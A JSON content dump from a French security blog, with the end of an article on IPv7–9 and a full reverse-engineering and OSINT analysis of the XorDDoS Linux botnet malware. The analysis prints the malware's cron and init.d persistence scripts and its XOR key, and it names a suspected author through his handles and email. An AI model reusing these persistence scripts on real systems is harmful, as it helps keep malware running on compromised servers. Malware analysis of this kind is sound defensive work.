IPv4.",[80,1397,1399],{"id":1398},"ipv7-8-et-9-projets-et-limites","IPv7, 8 et 9 − Projets et limites",[14,1401,1402,1403,1406,1407,1412],{},"IPv7 est un protocole appelé ",[120,1404,1405],{},"TP/IX"," sorti en 1993, les adresses IP sont codées sur 64 bits (contre 128 avec IPv6), on ne détaillera pas plus ce protocole mais si vous souhaitez en savoir plus je vous invite à lire la ",[32,1408,1411],{"href":1409,"rel":1410},"https://datatracker.ietf.org/doc/html/rfc1475",[252],"RFC"," d'IPv7 qui est très compréhensible.",[14,1414,1415,1420,1421,1424,1425,1430,1431,1434,1435,1437,1438,1440,1441,1443,1444,1446,1447,1449],{},[32,1416,1419],{"href":1417,"rel":1418},"https://datatracker.ietf.org/doc/html/rfc1621",[252],"IPv8"," appelé ",[120,1422,1423],{},"PIP"," et sorti en 1994, son fonctionnement repose en partie sur le système de ",[32,1426,1429],{"href":1427,"rel":1428},"https://ilearned.eu.org/les-bases-du-dns.html",[252],"DNS",". Chaque utilisateur du réseau a un ",[120,1432,1433],{},"PIP ID",", un identifiant unique codé sur 64 bits, ainsi, peu importe d'où il se connecte sur le réseau, il est possible de l'identifier rien qu'avec son ID. ",[120,1436,1423],{}," a donc été avant tout pensé pour faciliter les échanges entre appareils changeant d'adresse IP. On pourrait par exemple imaginer une connexion SSH utilisant uniquement le ",[120,1439,1433],{}," pour s'authentifier et qui, même si un des deux composants de la connexion (le client ou le serveur) change d'adresse IP reste stable. Je parlais plus tôt du DNS, en effet, avec ",[120,1442,1423],{}," le DNS est modifié pour renvoyer à la fois l(es) adresse(s) IP mais aussi le ",[120,1445,1433],{},". Ce système a néanmoins un problème majeur, le ",[120,1448,1433],{}," permettrait de pister très facilement les utilisateurs.",[14,1451,1452,1453,1458],{},"IPv9 enfin est un protocole très peu détaillé, il avait été ",[32,1454,1457],{"href":1455,"rel":1456},"http://www.china.org.cn/english/scitech/100279.htm",[252],"annoncé"," en grande pompe par le gouvernement chinois, celui-ci se targuant du fait que cette version d'IP ait été adoptée dans les secteurs militaires et civils, mais depuis cet effet d'annonce aucune spécification technique n'a été publiée, seulement des bruits de couloir comme quoi les adresses seraient codées sur 256 bits et composées uniquement de caractères numériques (et non pas hexadécimaux comme c'est le cas d'IPv6).",{"title":53,"searchDepth":54,"depth":54,"links":1460},[1461],{"id":1319,"depth":54,"text":1320},"On connaît tous IPv4 et IPv6, deux protocoles largement répandus. Dans cet article nous explorons les versions méconnues du protocole Internet.",{"author":23,"category":941,"date":1464,"highlighted":774,"published":774,"slug":1465,"initialPublisher":944,"initialLink":1466,"icon":1467,"cover":1468,"coverDescription":1469},"July 5, 2021","versions-ip","https://blog.ilearned.eu/versions-ip.html","ph:network-bold","https://uploads1.wikiart.org/images/marcel-duchamp/network-of-stoppages-1914.jpg","Network of stoppages, 1914 - Marcel Duchamp","/articles/versions-ip",{"title":1311,"description":1462},"articles/versions-ip","oh_iuuobgxSO8lK0PJgI20CXiso9GjZi6iqmqZoGot4",{"id":1475,"title":1476,"body":1477,"description":1861,"extension":59,"meta":1862,"navigation":61,"path":1869,"seo":1870,"stem":1871,"__hash__":1872},"articles/articles/xorddos-malware.md","Un malware, un cochon et un APT chinois",{"type":7,"value":1478,"toc":1859},[1479,1486,1493,1498,1507,1513,1517,1526,1532,1545,1548,1554,1565,1569,1584,1595,1601,1612,1619,1625,1635,1645,1649,1656,1675,1681,1688,1691,1695,1698,1701,1715,1721,1731,1737,1743,1749,1752,1755,1762,1766,1769,1784,1790,1796,1815,1818,1833,1835,1844,1847],[14,1480,1481,1482,1485],{},"Par un heureux hasard, un fichier nommé ",[120,1483,1484],{},"libudev.so",", apparemment malveillant, est apparu dans notre dossier Téléchargements, nous avons donc voulu en savoir plus. Entre reverse engineering, analyse réseau et OSINT, c’est cette quête d’information qui nous mènera à découvrir un mystérieux pirate, vouant une adoration à ses cochons, que nous allons relater dans cet article.",[14,1487,1488,1489,858],{},"Le sample analysé tout au long de cet article est disponible ",[32,1490,925],{"href":1491,"rel":1492},"https://bazaar.abuse.ch/sample/8642022960d919321ccfcfb0a0cd631db0e5dac3e75014fc0c4cc6ff413c72c5/",[252],[14,1494,1495],{},[75,1496,1497],{},"Disclaimer : I Learned ne saurait en aucun cas être responsable de tout dommage engendré par la manipulation du fichier présent ci-dessus, nous rappellons en outre que la distribution de malware à des fins malveillantes est illégale. En outre, l'attribution d'un malware à un acteur malveillant est un processus périlleux, l'analyse qui suit est donc à lire en gardant en tête qu'il ne s'agit que de suppositions.",[14,1499,1500,1501,1506],{},"L’image ci-dessous est une cartographie des informations récoltées dans cette enquête, elle a été faite sur ",[32,1502,1505],{"href":1503,"rel":1504},"https://www.maltego.com/",[252],"Maltego",", nous l'utiliserons tout au long de cet article !",[14,1508,1509],{},[93,1510],{"alt":1511,"src":1512},"maltego-global-view.webp","xorddos-malware/maltego-global-view.webp",[80,1514,1516],{"id":1515},"premières-analyses","Premières analyses",[14,1518,1519,1520,1525],{},"Notre premier réflexe à la vue de ce supposé malware est de le ",[32,1521,1524],{"href":1522,"rel":1523},"https://www.virustotal.com/gui/file/8642022960d919321ccfcfb0a0cd631db0e5dac3e75014fc0c4cc6ff413c72c5/detection",[252],"scanner dans un logiciel antivirus (VirusTotal)",". Le résultat est sans appel, de nombreux éditeurs d'antivirus détectent ce malware et le nomment, \"XorDDoS\".",[14,1527,1528],{},[93,1529],{"alt":1530,"src":1531},"virustotal.webp","xorddos-malware/virustotal.webp",[14,1533,1534,1535,1538,1539,1544],{},"Après plusieurs recherches on peut observer que ce malware est en fait une version d'un logiciel malveillant très connu découvert en 2014 par le groupe de recherche ",[120,1536,1537],{},"MalwareMustDie",". Ce malware a même fait l'objet d'",[32,1540,1543],{"href":1541,"rel":1542},"https://www.microsoft.com/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/",[252],"un article de Microsoft",", néanmoins, le virus analysé par la société éditrice de Windows n'est pas la même version que celle que nous analysons dans cet article.",[14,1546,1547],{},"On peut aussi remarquer que le binaire a été compilé de manière statique, c'est-à-dire en incluant toutes les librairies dont il dépend, par GCC 4.1.2 sur une machine Red Hat. La structure des fichiers sources du binaire est :",[113,1549,1552],{"className":1550,"code":1551,"language":118},[116],"- autorun.c\n- crc32.c\n- encrypt.c\n- execpacket.c\n- buildnet.c\n- hide.c\n- http.c\n- kill.c\n- main.c\n- proc.c\n- socket.c\n- tcp.c\n- thread.c\n- findip.c\n- dns.c\n\n",[120,1553,1551],{"__ignoreMap":53},[14,1555,1556,1557,1560,1561,1564],{},"Avec cette seule information, on peut déjà observer certains fichiers intéressants, comme ",[120,1558,1559],{},"encrypt.c"," ou ",[120,1562,1563],{},"hide.c"," .",[80,1566,1568],{"id":1567},"linfection","L'infection",[14,1570,1571,1572,1577,1578,1583],{},"Le principal vecteur d'infection utilisé par ce malware est le ",[32,1573,1576],{"href":1574,"rel":1575},"https://fr.wikipedia.org/wiki/Attaque_par_force_brute",[252],"bruteforce"," de serveur SSH, d'où l'importance d'utiliser de privilégié des clés cryptographiques, avec des algorithmes modernes (comme ",[32,1579,1582],{"href":1580,"rel":1581},"https://fr.wikipedia.org/wiki/EdDSA",[252],"EdDSA","), au lieu du traditionnel mot de passe.",[14,1585,1586,1587,1590,1591,1594],{},"Lors de la première infection, le malware va faire en sorte d'assurer sa persistance, pour ce faire, il va en premier lieu créer le fichier ",[120,1588,1589],{},"/etc/cron.hourly/gcc.sh",", celui-ci contient un script qui va simplement démarrer toutes les interfaces réseau, se copier dans un autre endroit et se lancer. Le fait que ce script soit présent dans le dossier ",[120,1592,1593],{},"/etc/cron.hourly"," à son importance, les scripts présents dans ce dossier sont lancé automatiquement par le système toutes les heures.",[113,1596,1599],{"className":1597,"code":1598,"language":118},[116],"#!/bin/sh\nPATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/\nfor i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`;\n  do ifconfig $i up\ndone # Démarre toutes les interfaces réseau\ncp /lib/libudev.so /lib/libudev.so.6\n/lib/libudev.so.6\n",[120,1600,1598],{"__ignoreMap":53},[14,1602,1603,1604,1607,1608,1611],{},"Le nommage du script en ",[120,1605,1606],{},"gcc.sh"," est sûrement fait pour se faire passer pour le compilateur bien connu ",[120,1609,1610],{},"gcc"," et donc ne pas paraitre suspect.",[14,1613,1614,1615,1618],{},"Une fois ce script cron créé, le malware va aussi créer un fichier dans ",[120,1616,1617],{},"/etc/init.d",", ce dossier contient des fichiers de services systemd, runit ou openrc sous forme de script shell. Le malware va donc créer dans ce dossier un fichier contenant le code suivant :",[113,1620,1623],{"className":1621,"code":1622,"language":118},[116],"#!/bin/sh\n# chkconfig: 12345 90 90\n# description: tlvgyjdotz\ncase $1 in\nstart)\n    /usr/bin/tlvgyjdotz\n    ;;\nstop)\n    ;;\n*)\n    /usr/bin/tlvgyjdotz\n    ;;\nesac\n",[120,1624,1622],{"__ignoreMap":53},[14,1626,1627,1628,1631,1632,1634],{},"On voit que ce simple script shell lance un binaire dans ",[120,1629,1630],{},"/usr/bin",", c'est en fait le même binaire que celui de notre malware initial (",[120,1633,1484],{},") mais qui est simplement copié avec un nom aléatoire, sûrement pour échapper à certains systèmes de protection.",[14,1636,1637,1638,1641,1642,858],{},"Ces deux moyens d'assurer la persistance du malware sont gérés par les fonctions ",[120,1639,1640],{},"InstallSys"," et ",[120,1643,1644],{},"add_service",[80,1646,1648],{"id":1647},"communication-avec-le-c2","Communication avec le C2",[14,1650,1651,1652,1655],{},"Une fois que le malware est installé avec succès, il va commencer la communication avec le C2 – C2, pour Command&Control, c'est le nom du/des serveur-s qui donnent des ordres aux machines infectées. Toute la communication avec l'extérieur se fait via une fonction nommée ",[120,1653,1654],{},"exec_packet",". Cette fonction permet notamment au binaire de se mettre à jour, mais aussi de télécharger d'autres binaires et de les lancer. Via cette fonction, le malware est aussi capable d'envoyer un hash md5 de son processus et de recevoir l'ordre de tuer certains processus. Lors de la première communication avec le C2, on a pu déterminer que plusieurs informations concernant la machine sont envoyées, dont notamment des statistiques sur la RAM, le CPU ou encore la vitesse de la connexion.",[14,1657,1658,1659,1664,1665,1641,1670,1674],{},"Enfin, cette fonction permet aussi de créer un grand nombre de threads dans lesquels est exécutée une fonction qui envoie des paquets TCP SYN, DNS ou TCP ACK, au vu du comportement de cette fonction, on peut supputer que ce serait elle qui serait en charge de lancer un DDoS vers une cible, les paquets ",[32,1660,1663],{"href":1661,"rel":1662},"https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/",[252],"SYN",", ",[32,1666,1669],{"href":1667,"rel":1668},"https://www.cloudflare.com/learning/ddos/what-is-an-ack-flood/",[252],"ACK",[32,1671,1429],{"href":1672,"rel":1673},"https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/",[252]," étant notamment très utilisés pour mener ce genre d'actions malveillantes.",[14,1676,1677],{},[93,1678],{"alt":1679,"src":1680},"malware-function-schema.webp","xorddos-malware/malware-function-schema.webp",[14,1682,1683,1684,1687],{},"Aussi, on peut remarquer qu'une grande partie des communications sont chiffrées au moyen de l'algorithme XOR, les clés (",[120,1685,1686],{},"BB2FA36AAA9541F0",") étant présentes en clair dans le code, il est trivial de déchiffrer ces données, celles-ci étant principalement des noms de domaine qui révèleront leur utilité dans la prochaine partie.",[14,1689,1690],{},"C'est l'utilisation intensive de XOR qui donne d'ailleurs à ce malware son nom, XorDDoS.",[80,1692,1694],{"id":1693},"exploration-de-linfrastructure-du-botnet","Exploration de l'infrastructure du botnet",[14,1696,1697],{},"En explorant les trames réseaux et à la lecture du code décompilé, nous avons rapidement pu identifier 4 domaines liés au malware. Deux d'entre eux contiennent la liste des potentielles C2. Un autre domaine semble lié une liste de victimes, le 4ᵉ domaine est lui inutilisé.",[14,1699,1700],{},"Nous avons pu trouver trois dénominateurs communs pour les serveurs qui semblent être les C2",[104,1702,1703,1706,1709],{},[107,1704,1705],{},"Ce sont des machines sous Windows Server 2012",[107,1707,1708],{},"Les IPs de ces serveurs appartiennent à l'hébergeur OVH, sous 2 organisations différentes.",[107,1710,1711,1712,858],{},"Ces deux organisations sont liées par un mail commun dans leur whois, ",[120,1713,1714],{},"admin@66[.]to",[14,1716,1717],{},[93,1718],{"alt":1719,"src":1720},"hack520-maltego.webp","xorddos-malware/hack520-maltego.webp",[14,1722,1723,1724,1727,1728,858],{},"Sur le nom de domaine ",[120,1725,1726],{},"66[.]to",", directement lié à l'adresse mail, on peut trouver, tout d'abord, ce site avec une image de cochon, elle aura son importance plus tard. Le site nous renvoie par ailleurs vers le sous-domaine ",[120,1729,1730],{},"secure[.]66[.]to",[14,1732,1733],{},[93,1734],{"alt":1735,"src":1736},"66-to-capture.webp","xorddos-malware/66-to-capture.webp",[14,1738,1739,1740,1742],{},"En se rendant sur ",[120,1741,1730],{}," on se retrouve sur le site d'un hébergeur un peu suspect.",[14,1744,1745],{},[93,1746],{"alt":1747,"src":1748},"secure-66-to-capture.webp","xorddos-malware/secure-66-to-capture.webp",[14,1750,1751],{},"(Les pages ont été traduites en anglais pour les besoins de l'article, elles étaient initialement en chinois.)",[14,1753,1754],{},"L'hébergeur en question est, selon les informations que nous avons pu trouver¹, lié à un pirate répondant au pseudo de Hack520 (nous y reviendrons).",[14,1756,1757,1758,1761],{},"En analysant les requêtes DNS faites par le binaire, nous avons pu remarquer le domaine ",[120,1759,1760],{},"a1.evil","*, ces requêtes renvoyant une liste d'IPs ne semblant n'avoir aucun lien entre elles. De plus, les IPs liées à ce nom de domaine changent de temps en temps, il semblerait que ces IPs sont seraient celles des machines compromises par le virus.",[80,1763,1765],{"id":1764},"découverte-de-lauteur-présumé","Découverte de l'auteur présumé",[14,1767,1768],{},"Comme cité plus haut, nous avons réussi à lier le botnet à un individu répondant au pseudo hack520.",[14,1770,1771,1772,1775,1776,1779,1780,1783],{},"C'est l'image de cochon que nous avons pu voir tout à l'heure qui nous a permis de remonter jusqu'à lui. La recherche d'image inversée de Baidu, nous a permis de remonter à un article de TrendMicro à propos de cet individu. La recherche inversée nous a aussi permis de retrouver certains de ses réseaux sociaux. Nous avons d'abord pu trouver son blog (",[120,1773,1774],{},"zhu[.]vn","), qui contenait des liens vers son compte twitter (",[120,1777,1778],{},"hack520_est","), nous avons aussi pu retrouver le Github (",[120,1781,1782],{},"Kwan9",") lui aussi grâce à l'image de cochon qui se trouve être la photo de profil. Par ailleurs, les deux cochons que vous pouvez retrouver ci-dessous répondent aux noms de LouLou (噜噜) et Mouchoutoutou (母豬嘟嘟).",[14,1785,1786],{},[93,1787],{"alt":1788,"src":1789},"loulou.webp","xorddos-malware/loulou.webp",[14,1791,1792],{},[93,1793],{"alt":1794,"src":1795},"moutchoutoutou.webp","xorddos-malware/moutchoutoutou.webp",[14,1797,1798,1799,1802,1803,1808,1809,1814],{},"Son compte github montre un certain attrait pour les mineurs de cryptomonnaie. À en croire ses commits, il possèderait l'adresse mail ",[120,1800,1801],{},"kwanleo@126.com",". On peut aussi via github savoir que son ordinateur est dans la timezone Asia/Shanghai, elle permet, avec diverses autres informations que nous avons, de faire penser qu'il se situerait à Hong Kong. Un autre élément qui tend à prouver sa présence sur Hong Kong est cette ",[32,1804,1807],{"href":1805,"rel":1806},"https://twitter.com/hack520_est/status/697290929107898368",[252],"photo"," sur son twitter qui nous montre le téléphérique de ",[32,1810,1813],{"href":1811,"rel":1812},"https://en.wikipedia.org/wiki/Ngong_Ping",[252],"Ngong Ping",". Un post sur son github nous permet aussi de voir qu'il utilise windows.",[14,1816,1817],{},"Nous avons trouvé certains de ses autres réseaux sociaux, mais il ne nous semblait rien apporter, c'est pourquoi nous ne les avons pas mis ici.",[14,1819,1820,1821,1826,1827,1832],{},"Via l'article de trendmicro, on apprend par ailleurs qu'il est potentiellement membre de ",[32,1822,1825],{"href":1823,"rel":1824},"https://malpedia.caad.fkie.fraunhofer.de/actor/axiom",[252],"Winnti Group",", un collectif proche d'",[32,1828,1831],{"href":1829,"rel":1830},"https://fr.wikipedia.org/wiki/Advanced_Persistent_Threat",[252],"APT"," chinois (41 et 17).",[80,1834,241],{"id":240},[14,1836,1837,1838,1843],{},"Pour résumer, d’après nos analyses, ce malware relativement peu sophistiqué serait utilisé pour former un réseau de botnet. Un botnet est un réseau de machines répondant un ordre d’un serveur central (C2), utilisées pour faire des attaques DDoS — Distributed Denial of Service. Nous avons par ailleurs réussi à identifier certaines victimes présumées présentes dans ce réseau de botnet. Il s'avère que ce logiciel malveillant est déjà relativement connu et nommé XorDDos. Celui-ci est d'ailleurs détecté par de nombreux antivirus, incluant le logiciel libre ",[32,1839,1842],{"href":1840,"rel":1841},"https://www.clamav.net/",[252],"ClamAV",". Si vous souhaitez vous protéger de menaces similaires, il peut être intéressant de vous renseigner sur l'utilisation de logiciels antivirus sur vos serveurs !",[14,1845,1846],{},"*Les adresses et pseudonymes ont été modifiés",[104,1848,1849],{},[107,1850,1851,1853,1854],{},[519,1852,662],{}," ",[32,1855,1858],{"href":1856,"rel":1857},"https://www.trendmicro.com/en_us/research/17/d/pigs-malware-examining-possible-member-winnti-group.html",[252],"Examining a Possible Member of the Winnti Group",{"title":53,"searchDepth":54,"depth":54,"links":1860},[],"Par un heureux hasard, un fichier nommé libudev.so, apparemment malveillant, est apparu dans notre dossier Téléchargements, nous avons donc voulu en savoir plus. Entre reverse engineering, analyse réseau et OSINT, c’est cette quête d’information qui nous mènera à découvrir un mystérieux pirate, vouant une adoration à ses cochons, que nous allons relater dans cet article. Notre premier réflexe à la vue de ce supposé malware est de le scanner dans un logiciel antivirus (VirusTotal). Le résultat est sans appel, de nombreux éditeurs d'antivirus détectent ce malware et le nomment, \"XorDDoS\".",{"author":23,"category":941,"date":1863,"highlighted":774,"published":774,"slug":1864,"initialPublisher":944,"initialLink":1865,"icon":1866,"cover":1867,"coverDescription":1868},"July 9, 2022","xorddos-malware","https://blog.ilearned.eu/xorddos.html","ph:piggy-bank-bold","https://uploads4.wikiart.org/images/niko-pirosmani/sow-with-piglets(1).jpg","Sow with piglets - Niko Pirosmani","/articles/xorddos-malware",{"title":1476,"description":1861},"articles/xorddos-malware","2Z2yRoFll4PEVtfQQH_-FT4Gj9EUhsJa0fOHTIb_sFk",1774186572048]